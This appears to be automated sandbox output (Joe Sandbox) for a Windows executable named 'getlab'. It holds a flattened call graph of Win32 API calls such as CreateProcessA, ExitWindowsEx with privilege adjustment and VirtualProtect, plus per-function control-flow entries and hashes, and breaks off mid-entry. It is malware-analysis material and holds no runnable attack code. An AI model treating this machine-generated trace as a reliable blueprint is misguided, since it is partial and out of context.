5962->5964 5966 4091fe 5964->5966 5978 4032a8 5964->5978 5981 403494 5964->5981 5967 403198 4 API calls 5966->5967 5968 409213 5967->5968 5968->5884 5985 408f70 5969->5985 5971 40904a 5972 40904e 5971->5972 5991 406a48 5971->5991 5972->5884 5975 409081 5994 408fac 5975->5994 5979 403278 4 API calls 5978->5979 5980 4032b5 5979->5980 5980->5964 5982 403498 5981->5982 5984 4034c3 5981->5984 5983 4034f0 4 API calls 5982->5983 5983->5984 5984->5964 5986 408f7a 5985->5986 5987 408f7e 5985->5987 5986->5971 5988 408fa0 SetLastError 5987->5988 5989 408f87 Wow64DisableWow64FsRedirection 5987->5989 5990 408f9b 5988->5990 5989->5990 5990->5971 5992 4069dc 7 API calls 5991->5992 5993 406a52 GetLastError 5992->5993 5993->5975 5995 408fb1 Wow64RevertWow64FsRedirection 5994->5995 5996 408fbb 5994->5996 5995->5996 5996->5884 5998 403198 4 API calls 5997->5998 6004 408cb1 5997->6004 5998->6004 5999 408cdc 6000 4031b8 4 API calls 5999->6000 6002 408d69 6000->6002 6001 408cc8 6005 4032fc 4 API calls 6001->6005 6002->5697 6003 403278 4 API calls 6003->6004 6004->5999 6004->6001 6004->6003 6006 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6004->6006 6005->5999 6006->6004 6008 406744 IsDBCSLeadByte 6007->6008 6010 406835 6008->6010 6009 40687f 6009->5709 6010->6009 6011 406680 IsDBCSLeadByte 6010->6011 6011->6010 6013 4068f3 6012->6013 6014 406820 IsDBCSLeadByte 6013->6014 6016 4068fe 6014->6016 6015 4066ea 6015->5714 6015->5715 6016->6015 6017 406680 IsDBCSLeadByte 6016->6017 6017->6016 6019 406957 6018->6019 6020 40695b 6018->6020 6019->5728 6023 406970 CharPrevA 6020->6023 6022 40696c 6022->5728 6023->6022 6025 402bd5 RaiseException 6024->6025 6026 402be6 6024->6026 6025->6026 6026->5752 6279 402e64 6280 402e69 6279->6280 6281 402e7a RtlUnwind 6280->6281 6282 402e5e 6280->6282 6283 402e9d 6281->6283 6300 40667c IsDBCSLeadByte 6301 406694 6300->6301 6713 403f7d 6714 403fa2 6713->6714 6717 403f84 6713->6717 6716 403e8e 4 API calls 6714->6716 6714->6717 6715 403f8c 6716->6717 6717->6715 6718 402674 4 API calls 6717->6718 6719 403fca 6718->6719 6726 403d02 6733 403d12 6726->6733 6727 403ddf ExitProcess 6728 403db8 6730 403cc8 4 API calls 6728->6730 6729 403dea 6731 403dc2 6730->6731 6732 403cc8 4 API calls 6731->6732 6734 403dcc 6732->6734 6733->6727 6733->6728 6733->6729 6733->6733 6736 403da4 6733->6736 6737 403d8f MessageBoxA 6733->6737 6746 4019dc 6734->6746 6742 403fe4 6736->6742 6737->6728 6739 403dd1 6739->6727 6739->6729 6743 403fe8 6742->6743 6744 403f07 4 API calls 6743->6744 6745 404006 6744->6745 6747 401abb 6746->6747 6748 4019ed 6746->6748 6747->6739 6749 401a04 RtlEnterCriticalSection 6748->6749 6750 401a0e LocalFree 6748->6750 6749->6750 6751 401a41 6750->6751 6752 401a2f VirtualFree 6751->6752 6753 401a49 6751->6753 6752->6751 6754 401a70 LocalFree 6753->6754 6755 401a87 6753->6755 6754->6754 6754->6755 6756 401aa9 RtlDeleteCriticalSection 6755->6756 6757 401a9f RtlLeaveCriticalSection 6755->6757 6756->6739 6757->6756 6310 404206 6311 40420a 6310->6311 6312 4041cc 6310->6312 6313 404282 6311->6313 6314 403154 4 API calls 6311->6314 6315 404323 6314->6315 6316 402c08 6319 402c82 6316->6319 6320 402c19 6316->6320 6317 402c56 RtlUnwind 6318 403154 4 API calls 6317->6318 6318->6319 6320->6317 6320->6319 6323 402b28 6320->6323 6324 402b31 RaiseException 6323->6324 6325 402b47 6323->6325 6324->6325 6325->6317 6326 408c10 6327 408c17 6326->6327 6328 403198 4 API calls 6327->6328 6336 408cb1 6328->6336 6329 408cdc 6330 4031b8 4 API calls 6329->6330 6332 408d69 6330->6332 6331 408cc8 6334 4032fc 4 API calls 6331->6334 6333 403278 4 API calls 6333->6336 6334->6329 6335 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6335->6336 6336->6329 6336->6331 6336->6333 6336->6335 6337 40a011 6338 40a036 6337->6338 6339 407918 InterlockedExchange 6338->6339 6341 40a060 6339->6341 6340 40a070 6347 4076ac SetEndOfFile 6340->6347 6341->6340 6342 409aa0 4 API calls 6341->6342 6342->6340 6344 40a08c 6345 4025ac 4 API calls 6344->6345 6346 40a0c3 6345->6346 6348 4076c3 6347->6348 6349 4076bc 6347->6349 6348->6344 6350 40748c 21 API calls 6349->6350 6350->6348 6762 409916 6763 409918 6762->6763 6764 40993a 6763->6764 6765 409956 CallWindowProcA 6763->6765 6765->6764 6078 407017 6079 407008 SetErrorMode 6078->6079 6355 403018 6356 403070 6355->6356 6357 403025 6355->6357 6358 40302a RtlUnwind 6357->6358 6359 40304e 6358->6359 6361 402f78 6359->6361 6362 402be8 6359->6362 6363 402bf1 RaiseException 6362->6363 6364 402c04 6362->6364 6363->6364 6364->6356 6772 409918 6773 409927 6772->6773 6774 40993a 6772->6774 6773->6774 6775 409956 CallWindowProcA 6773->6775 6775->6774 6369 40901e 6370 409010 6369->6370 6371 408fac Wow64RevertWow64FsRedirection 6370->6371 6372 409018 6371->6372 6373 409020 SetLastError 6374 409029 6373->6374 6385 403a28 ReadFile 6386 403a46 6385->6386 6387 403a49 GetLastError 6385->6387 6216 40762c ReadFile 6217 407663 6216->6217 6218 40764c 6216->6218 6219 407652 GetLastError 6218->6219 6220 40765c 6218->6220 6219->6217 6219->6220 6221 40748c 21 API calls 6220->6221 6221->6217 6392 40a02c 6393 409aa0 4 API calls 6392->6393 6394 40a031 6393->6394 6395 40a036 6394->6395 6396 402f24 5 API calls 6394->6396 6397 407918 InterlockedExchange 6395->6397 6396->6395 6398 40a060 6397->6398 6399 40a070 6398->6399 6400 409aa0 4 API calls 6398->6400 6401 4076ac 22 API calls 6399->6401 6400->6399 6402 40a08c 6401->6402 6403 4025ac 4 API calls 6402->6403 6404 40a0c3 6403->6404 6776 40712e 6777 407118 6776->6777 6778 403198 4 API calls 6777->6778 6779 407120 6778->6779 6780 403198 4 API calls 6779->6780 6781 407128 6780->6781 6782 408f30 6785 408dfc 6782->6785 6786 408e05 6785->6786 6787 403198 4 API calls 6786->6787 6788 408e13 6786->6788 6787->6786 6789 403932 6790 403924 6789->6790 6793 40374c 6790->6793 6792 40392c 6794 403766 6793->6794 6795 403759 6793->6795 6794->6792 6795->6794 6796 403779 VariantClear 6795->6796 6796->6792 6027 4075c4 SetFilePointer 6028 4075f7 6027->6028 6029 4075e7 GetLastError 6027->6029 6029->6028 6030 4075f0 6029->6030 6031 40748c 21 API calls 6030->6031 6031->6028 6405 405ac4 6406 405acc 6405->6406 6410 405ad4 6405->6410 6407 405ad2 6406->6407 6408 405adb 6406->6408 6412 405a3c 6407->6412 6409 405930 5 API calls 6408->6409 6409->6410 6418 405a44 6412->6418 6413 405a5e 6415 405a63 6413->6415 6416 405a7a 6413->6416 6414 403154 4 API calls 6414->6418 6419 405930 5 API calls 6415->6419 6417 403154 4 API calls 6416->6417 6421 405a7f 6417->6421 6418->6413 6418->6414 6420 405a76 6419->6420 6423 403154 4 API calls 6420->6423 6422 4059a0 19 API calls 6421->6422 6422->6420 6424 405aa8 6423->6424 6425 403154 4 API calls 6424->6425 6426 405ab6 6425->6426 6426->6410 6427 4076c8 WriteFile 6428 4076e8 6427->6428 6429 4076ef 6427->6429 6430 40748c 21 API calls 6428->6430 6431 407700 6429->6431 6432 4073ec 20 API calls 6429->6432 6430->6429 6432->6431 6433 40a2ca 6442 4096fc 6433->6442 6436 402f24 5 API calls 6437 40a2d4 6436->6437 6438 403198 4 API calls 6437->6438 6439 40a2f3 6438->6439 6440 403198 4 API calls 6439->6440 6441 40a2fb 6440->6441 6451 40569c 6442->6451 6444 409745 6448 403198 4 API calls 6444->6448 6445 409717 6445->6444 6457 40720c 6445->6457 6447 409735 6450 40973d MessageBoxA 6447->6450 6449 40975a 6448->6449 6449->6436 6450->6444 6452 403154 4 API calls 6451->6452 6454 4056a1 6452->6454 6453 4056b9 6453->6445 6454->6453 6455 403154 4 API calls 6454->6455 6456 4056af 6455->6456 6456->6445 6458 40569c 4 API calls 6457->6458 6459 40721b 6458->6459 6460 407221 6459->6460 6461 40722f 6459->6461 6462 40322c 4 API calls 6460->6462 6464 40723f 6461->6464 6466 40724b 6461->6466 6463 40722d 6462->6463 6463->6447 6468 4071d0 6464->6468 6475 4032b8 6466->6475 6469 40322c 4 API calls 6468->6469 6470 4071df 6469->6470 6471 4071fc 6470->6471 6472 406950 CharPrevA 6470->6472 6471->6463 6473 4071eb 6472->6473 6473->6471 6474 4032fc 4 API calls 6473->6474 6474->6471 6476 403278 4 API calls 6475->6476 6477 4032c2 6476->6477 6477->6463 6478 402ccc 6479 402cdd 6478->6479 6483 402cfe 6478->6483 6480 402d88 RtlUnwind 6479->6480 6482 402b28 RaiseException 6479->6482 6479->6483 6481 403154 4 API calls 6480->6481 6481->6483 6484 402d7f 6482->6484 6484->6480 6805 403fcd 6806 403f07 4 API calls 6805->6806 6807 403fd6 6806->6807 6808 403e9c 4 API calls 6807->6808 6809 403fe2 6808->6809 5463 4024d0 5464 4024e4 5463->5464 5465 4024f7 5463->5465 5502 401918 RtlInitializeCriticalSection 5464->5502 5467 402518 5465->5467 5468 40250e RtlEnterCriticalSection 5465->5468 5479 402300 5467->5479 5468->5467 5471 4024ed 5473 402525 5476 402581 5473->5476 5477 402577 RtlLeaveCriticalSection 5473->5477 5475 402531 5475->5473 5509 40215c 5475->5509 5477->5476 5480 402314 5479->5480 5481 402335 5480->5481 5482 4023b8 5480->5482 5484 402344 5481->5484 5523 401b74 5481->5523 5482->5484 5487 402455 5482->5487 5526 401d80 5482->5526 5534 401e84 5482->5534 5484->5473 5489 401fd4 5484->5489 5487->5484 5530 401d00 5487->5530 5490 401fe8 5489->5490 5491 401ffb 5489->5491 5492 401918 4 API calls 5490->5492 5493 402012 RtlEnterCriticalSection 5491->5493 5496 40201c 5491->5496 5494 401fed 5492->5494 5493->5496 5494->5491 5495 401ff1 5494->5495 5499 402052 5495->5499 5496->5499 5616 401ee0 5496->5616 5499->5475 5500 402147 5500->5475 5501 40213d RtlLeaveCriticalSection 5501->5500 5503 40193c RtlEnterCriticalSection 5502->5503 5504 401946 5502->5504 5503->5504 5505 401964 LocalAlloc 5504->5505 5506 40197e 5505->5506 5507 4019c3 RtlLeaveCriticalSection 5506->5507 5508 4019cd 5506->5508 5507->5508 5508->5465 5508->5471 5510 40217a 5509->5510 5511 402175 5509->5511 5512 4021ab RtlEnterCriticalSection 5510->5512 5515 4021b5 5510->5515 5519 40217e 5510->5519 5513 401918 4 API calls 5511->5513 5512->5515 5513->5510 5514 4021c1 5517 4022e3 RtlLeaveCriticalSection 5514->5517 5518 4022ed 5514->5518 5515->5514 5516 402244 5515->5516 5521 402270 5515->5521 5516->5519 5520 401d80 7 API calls 5516->5520 5517->5518 5518->5473 5519->5473 5520->5519 5521->5514 5522 401d00 7 API calls 5521->5522 5522->5514 5524 40215c 9 API calls 5523->5524 5525 401b95 5524->5525 5525->5484 5527 401d92 5526->5527 5528 401d89 5526->5528 5527->5482 5528->5527 5529 401b74 9 API calls 5528->5529 5529->5527 5531 401d1e 5530->5531 5532 401d4e 5530->5532 5531->5484 5532->5531 5539 401c68 5532->5539 5594 401768 5534->5594 5536 401e99 5537 401ea6 5536->5537 5605 401dcc 5536->5605 5537->5482 5540 401c7a 5539->5540 5541 401c9d 5540->5541 5542 401caf 5540->5542 5552 40188c 5541->5552 5543 40188c 3 API calls 5542->5543 5545 401cad 5543->5545 5546 401cc5 5545->5546 5562 401b44 5545->5562 5546->5531 5548 401cd4 5549 401cee 5548->5549 5567 401b98 5548->5567 5572 4013a0 5549->5572 5553 4018b2 5552->5553 5561 40190b 5552->5561 5576 401658 5553->5576 5558 4018e6 5560 4013a0 LocalAlloc 5558->5560 5558->5561 5560->5561 5561->5545 5563 401b52 5562->5563 5564 401b61 5562->5564 5565 401d00 9 API calls 5563->5565 5564->5548 5566 401b5f 5565->5566 5566->5548 5568 401bab 5567->5568 5569 401b9d 5567->5569 5568->5549 5570 401b74 9 API calls 5569->5570 5571 401baa 5570->5571 5571->5549 5573 4013ab 5572->5573 5574 4012e4 LocalAlloc 5573->5574 5575 4013c6 5573->5575 5574->5575 5575->5546 5579 40168f 5576->5579 5577 4016cf 5580 40132c 5577->5580 5578 4016a9 VirtualFree 5578->5579 5579->5577 5579->5578 5581 401348 5580->5581 5588 4012e4 5581->5588 5584 40150c 5586 40153b 5584->5586 5585 401594 5585->5558 5586->5585 5587 401568 VirtualFree 5586->5587 5587->5586 5591 40128c 5588->5591 5592 401298 LocalAlloc 5591->5592 5593 4012aa 5591->5593 5592->5593 5593->5558 5593->5584 5595 401787 5594->5595 5596 40183b 5595->5596 5597 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5595->5597 5599 40132c LocalAlloc 5595->5599 5600 401821 5595->5600 5601 4017d6 5595->5601 5602 4017e7 5596->5602 5612 4015c4 5596->5612 5597->5595 5599->5595 5603 40150c VirtualFree 5600->5603 5604 40150c VirtualFree 5601->5604 5602->5536 5603->5602 5604->5602 5606 401d80 9 API calls 5605->5606 5607 401de0 5606->5607 5608 40132c LocalAlloc 5607->5608 5609 401df0 5608->5609 5610 401b44 9 API calls 5609->5610 5611 401df8 5609->5611 5610->5611 5611->5537 5613 40160a 5612->5613 5614 401626 VirtualAlloc 5613->5614 5615 40163a 5613->5615 5614->5613 5614->5615 5615->5602 5620 401ef0 5616->5620 5617 401f1c 5618 401d00 9 API calls 5617->5618 5621 401f40 5617->5621 5618->5621 5620->5617 5620->5621 5622 401e58 5620->5622 5621->5500 5621->5501 5627 4016d8 5622->5627 5625 401dcc 9 API calls 5626 401e75 5625->5626 5626->5620 5633 4016f4 5627->5633 5629 4016fe 5630 4015c4 VirtualAlloc 5629->5630 5635 40170a 5630->5635 5631 40175b 5631->5625 5631->5626 5632 40132c LocalAlloc 5632->5633 5633->5629 5633->5631 5633->5632 5634 40174f 5633->5634 5637 401430 5633->5637 5636 40150c VirtualFree 5634->5636 5635->5631 5636->5631 5638 40143f VirtualAlloc 5637->5638 5640 40146c 5638->5640 5641 40148f 5638->5641 5642 4012e4 LocalAlloc 5640->5642 5641->5633 5643 401478 5642->5643 5643->5641 5644 40147c VirtualFree 5643->5644 5644->5641 6485 4028d2 6486 4028da 6485->6486 6487 403554 4 API calls 6486->6487 6488 4028ef 6486->6488 6487->6486 6489 4025ac 4 API calls 6488->6489 6490 4028f4 6489->6490 6810 4019d3 6811 4019ba 6810->6811 6812 4019c3 RtlLeaveCriticalSection 6811->6812 6813 4019cd 6811->6813 6812->6813 6032 407fd4 6033 407fe6 6032->6033 6035 407fed 6032->6035 6043 407f10 6033->6043 6037 408015 6035->6037 6038 408017 6035->6038 6042 408021 6035->6042 6036 40804e 6057 407e2c 6037->6057 6054 407d7c 6038->6054 6039 407d7c 19 API calls 6039->6036 6042->6036 6042->6039 6044 407f25 6043->6044 6045 407d7c 19 API calls 6044->6045 6046 407f34 6044->6046 6045->6046 6047 407f6e 6046->6047 6048 407d7c 19 API calls 6046->6048 6049 407f82 6047->6049 6050 407d7c 19 API calls 6047->6050 6048->6047 6053 407fae 6049->6053 6064 407eb8 6049->6064 6050->6049 6053->6035 6067 4058b4 6054->6067 6056 407d9e 6056->6042 6058 405184 19 API calls 6057->6058 6059 407e57 6058->6059 6075 407de4 6059->6075 6061 407e5f 6062 403198 4 API calls 6061->6062 6063 407e74 6062->6063 6063->6042 6065 407ec7 VirtualFree 6064->6065 6066 407ed9 VirtualAlloc 6064->6066 6065->6066 6066->6053 6068 4058c0 6067->6068 6069 405184 19 API calls 6068->6069 6070 4058ed 6069->6070 6071 4031e8 4 API calls 6070->6071 6072 4058f8 6071->6072 6073 403198 4 API calls 6072->6073 6074 40590d 6073->6074 6074->6056 6076 4058b4 19 API calls 6075->6076 6077 407e06 6076->6077 6077->6061 6495 40a0d5 6496 40a105 6495->6496 6497 40a10f CreateWindowExA SetWindowLongA 6496->6497 6498 405184 19 API calls 6497->6498 6499 40a192 6498->6499 6500 4032fc 4 API calls 6499->6500 6501 40a1a0 6500->6501 6502 4032fc 4 API calls 6501->6502 6503 40a1ad 6502->6503 6504 406b7c 5 API calls 6503->6504 6505 40a1b9 6504->6505 6506 4032fc 4 API calls 6505->6506 6507 40a1c2 6506->6507 6508 4099a4 29 API calls 6507->6508 6509 40a1d4 6508->6509 6510 409884 5 API calls 6509->6510 6511 40a1e7 6509->6511 6510->6511 6512 40a220 6511->6512 6513 4094d8 9 API calls 6511->6513 6514 40a239 6512->6514 6517 40a233 RemoveDirectoryA 6512->6517 6513->6512 6515 40a242 73A25CF0 6514->6515 6516 40a24d 6514->6516 6515->6516 6518 40a275 6516->6518 6519 40357c 4 API calls 6516->6519 6517->6514 6520 40a26b 6519->6520 6521 4025ac 4 API calls 6520->6521 6521->6518 6080 40a0e7 6081 40a0eb SetLastError 6080->6081 6112 409648 GetLastError 6081->6112 6084 40a105 6086 40a10f CreateWindowExA SetWindowLongA 6084->6086 6085 402f24 5 API calls 6085->6084 6087 405184 19 API calls 6086->6087 6088 40a192 6087->6088 6089 4032fc 4 API calls 6088->6089 6090 40a1a0 6089->6090 6091 4032fc 4 API calls 6090->6091 6092 40a1ad 6091->6092 6125 406b7c GetCommandLineA 6092->6125 6095 4032fc 4 API calls 6096 40a1c2 6095->6096 6130 4099a4 6096->6130 6099 409884 5 API calls 6100 40a1e7 6099->6100 6101 40a220 6100->6101 6102 40a207 6100->6102 6104 40a239 6101->6104 6107 40a233 RemoveDirectoryA 6101->6107 6146 4094d8 6102->6146 6105 40a242 73A25CF0 6104->6105 6106 40a24d 6104->6106 6105->6106 6108 40a275 6106->6108 6154 40357c 6106->6154 6107->6104 6110 40a26b 6111 4025ac 4 API calls 6110->6111 6111->6108 6113 404c84 19 API calls 6112->6113 6114 40968f 6113->6114 6115 407284 5 API calls 6114->6115 6116 40969f 6115->6116 6117 408da8 4 API calls 6116->6117 6118 4096b4 6117->6118 6119 405880 4 API calls 6118->6119 6120 4096c3 6119->6120 6121 4031b8 4 API calls 6120->6121 6122 4096e2 6121->6122 6123 403198 4 API calls 6122->6123 6124 4096ea 6123->6124 6124->6084 6124->6085 6126 406af0 4 API calls 6125->6126 6127 406ba1 6126->6127 6128 403198 4 API calls 6127->6128 6129 406bbf 6128->6129 6129->6095 6131 4033b4 4 API calls 6130->6131 6132 4099df 6131->6132 6133 409a11 CreateProcessA 6132->6133 6134 409a24 CloseHandle 6133->6134 6135 409a1d 6133->6135 6137 409a2d 6134->6137 6136 409648 21 API calls 6135->6136 6136->6134 6167 409978 6137->6167 6140 409a49 6141 409978 3 API calls 6140->6141 6142 409a4e GetExitCodeProcess CloseHandle 6141->6142 6143 409a6e 6142->6143 6144 403198 4 API calls 6143->6144 6145 409a76 6144->6145 6145->6099 6145->6100 6147 409532 6146->6147 6148 4094eb 6146->6148 6147->6101 6148->6147 6149 4094f3 Sleep 6148->6149 6150 409503 Sleep 6148->6150 6152 40951a GetLastError 6148->6152 6171 408fbc 6148->6171 6149->6148 6150->6148 6152->6147 6153 409524 GetLastError 6152->6153 6153->6147 6153->6148 6155 403591 6154->6155 6163 4035a0 6154->6163 6159 4035d0 6155->6159 6160 40359b 6155->6160 6162 4035b6 6155->6162 6156 4035b1 6161 403198 4 API calls 6156->6161 6157 4035b8 6158 4031b8 4 API calls 6157->6158 6158->6162 6159->6162 6165 40357c 4 API calls 6159->6165 6160->6163 6164 4035ec 6160->6164 6161->6162 6162->6110 6163->6156 6163->6157 6164->6162 6179 403554 6164->6179 6165->6159 6168 40998c PeekMessageA 6167->6168 6169 409980 TranslateMessage DispatchMessageA 6168->6169 6170 40999e MsgWaitForMultipleObjects 6168->6170 6169->6168 6170->6137 6170->6140 6172 408f70 2 API calls 6171->6172 6173 408fd2 6172->6173 6174 408fd6 6173->6174 6175 408ff2 DeleteFileA GetLastError 6173->6175 6174->6148 6176 409010 6175->6176 6177 408fac Wow64RevertWow64FsRedirection 6176->6177 6178 409018 6177->6178 6178->6148 6180 403566 6179->6180 6182 403578 6180->6182 6183 403604 6180->6183 6182->6164 6185 40357c 6183->6185 6184 4035a0 6186 4035b1 6184->6186 6187 4035b8 6184->6187 6185->6184 6189 4035d0 6185->6189 6190 40359b 6185->6190 6192 4035b6 6185->6192 6191 403198 4 API calls 6186->6191 6188 4031b8 4 API calls 6187->6188 6188->6192 6189->6192 6194 40357c 4 API calls 6189->6194 6190->6184 6193 4035ec 6190->6193 6191->6192 6192->6180 6193->6192 6195 403554 4 API calls 6193->6195 6194->6189 6195->6193 6817 402be9 RaiseException 6818 402c04 6817->6818 6528 402af2 6529 402afe 6528->6529 6532 402ed0 6529->6532 6533 403154 4 API calls 6532->6533 6535 402ee0 6533->6535 6534 402b03 6535->6534 6537 402b0c 6535->6537 6538 402b25 6537->6538 6539 402b15 RaiseException 6537->6539 6538->6534 6539->6538 6819 402dfa 6820 402e26 6819->6820 6821 402e0d 6819->6821 6823 402ba4 6821->6823 6824 402bc9 6823->6824 6825 402bad 6823->6825 6824->6820 6826 402bb5 RaiseException 6825->6826 6826->6824 6827 4075fa GetFileSize 6828 407626 6827->6828 6829 407616 GetLastError 6827->6829 6829->6828 6830 40761f 6829->6830 6831 40748c 21 API calls 6830->6831 6831->6828 6832 406ffb 6833 407008 SetErrorMode 6832->6833 6544 403a80 CloseHandle 6545 403a90 6544->6545 6546 403a91 GetLastError 6544->6546 6547 40a282 6548 40a1f4 6547->6548 6549 4094d8 9 API calls 6548->6549 6551 40a220 6548->6551 6549->6551 6550 40a239 6552 40a242 73A25CF0 6550->6552 6553 40a24d 6550->6553 6551->6550 6554 40a233 RemoveDirectoryA 6551->6554 6552->6553 6555 40a275 6553->6555 6556 40357c 4 API calls 6553->6556 6554->6550 6557 40a26b 6556->6557 6558 4025ac 4 API calls 6557->6558 6558->6555 6559 404283 6560 4042c3 6559->6560 6561 403154 4 API calls 6560->6561 6562 404323 6561->6562 6834 404185 6835 4041ff 6834->6835 6836 4041cc 6835->6836 6837 403154 4 API calls 6835->6837 6838 404323 6837->6838 6563 40a287 6564 40a290 6563->6564 6566 40a2bb 6563->6566 6573 409448 6564->6573 6568 403198 4 API calls 6566->6568 6567 40a295 6567->6566 6570 40a2b3 MessageBoxA 6567->6570 6569 40a2f3 6568->6569 6571 403198 4 API calls 6569->6571 6570->6566 6572 40a2fb 6571->6572 6574 409454 GetCurrentProcess OpenProcessToken 6573->6574 6575 4094af ExitWindowsEx 6573->6575 6576 409466 6574->6576 6577 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6574->6577 6575->6576 6576->6567 6577->6575 6577->6576 6578 403e87 6579 403e4c 6578->6579 6580 403e62 6579->6580 6581 403e7b 6579->6581 6582 403e67 6579->6582 6587 403cc8 6580->6587 6583 402674 4 API calls 6581->6583 6585 403e78 6582->6585 6591 402674 6582->6591 6583->6585 6588 403cd6 6587->6588 6589 402674 4 API calls 6588->6589 6590 403ceb 6588->6590 6589->6590 6590->6582 6592 403154 4 API calls 6591->6592 6593 40267a 6592->6593 6593->6585 6598 407e90 6599 407eb8 VirtualFree 6598->6599 6600 407e9d 6599->6600 6847 403991 6848 403983 6847->6848 6849 40374c VariantClear 6848->6849 6850 40398b 6849->6850 6851 405b92 6853 405b94 6851->6853 6852 405bd0 6856 405930 5 API calls 6852->6856 6853->6852 6854 405be7 6853->6854 6855 405bca 6853->6855 6860 404ccc 5 API calls 6854->6860 6855->6852 6857 405c3c 6855->6857 6858 405be3 6856->6858 6859 4059a0 19 API calls 6857->6859 6861 403198 4 API calls 6858->6861 6859->6858 6862 405c10 6860->6862 6863 405c76 6861->6863 6864 4059a0 19 API calls 6862->6864 6864->6858 6603 403e95 6604 403e4c 6603->6604 6605 403e67 6604->6605 6606 403e62 6604->6606 6607 403e7b 6604->6607 6610 403e78 6605->6610 6611 402674 4 API calls 6605->6611 6609 403cc8 4 API calls 6606->6609 6608 402674 4 API calls 6607->6608 6608->6610 6609->6605 6611->6610 6612 403a97 6613 403aac 6612->6613 6614 403bbc GetStdHandle 6613->6614 6615 403b0e CreateFileA 6613->6615 6625 403ab2 6613->6625 6616 403c17 GetLastError 6614->6616 6620 403bba 6614->6620 6615->6616 6617 403b2c 6615->6617 6616->6625 6619 403b3b GetFileSize 6617->6619 6617->6620 6619->6616 6622 403b4e SetFilePointer 6619->6622 6621 403be7 GetFileType 6620->6621 6620->6625 6624 403c02 CloseHandle 6621->6624 6621->6625 6622->6616 6626 403b6a ReadFile 6622->6626 6624->6625 6626->6616 6627 403b8c 6626->6627 6627->6620 6628 403b9f SetFilePointer 6627->6628 6628->6616 6629 403bb0 SetEndOfFile 6628->6629 6629->6616 6629->6620 6883 4011aa 6884 4011ac GetStdHandle 6883->6884 6222 4076ac SetEndOfFile 6223 4076c3 6222->6223 6224 4076bc 6222->6224 6225 40748c 21 API calls 6224->6225 6225->6223 6633 4028ac 6634 402594 4 API calls 6633->6634 6635 4028b6 6634->6635 6636 401ab9 6637 401a96 6636->6637 6638 401aa9 RtlDeleteCriticalSection 6637->6638 6639 401a9f RtlLeaveCriticalSection 6637->6639 6639->6638

                                                                          Executed Functions

                                                                          Function 00409B30 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 126 409b97 124->126 127 409b99-409b9b 124->127 125->124 128 409b7a-409b7d 125->128 126->127 130 409baa-409bad 127->130 128->124 129 409b7f-409b82 128->129 129->124 129->127 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 134 409bb3-409bc0 VirtualProtect 132->134 134->121
                                                                          APIs
                                                                          • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                          • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                          • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                          • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ProtectQuery$InfoSystem
                                                                          • String ID:
                                                                          • API String ID: 2441996862-0
                                                                          • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                          • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                          • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                          • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                          Function 004051FC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                          • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                          • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                          • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE
                                                                          Function 0040457C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule

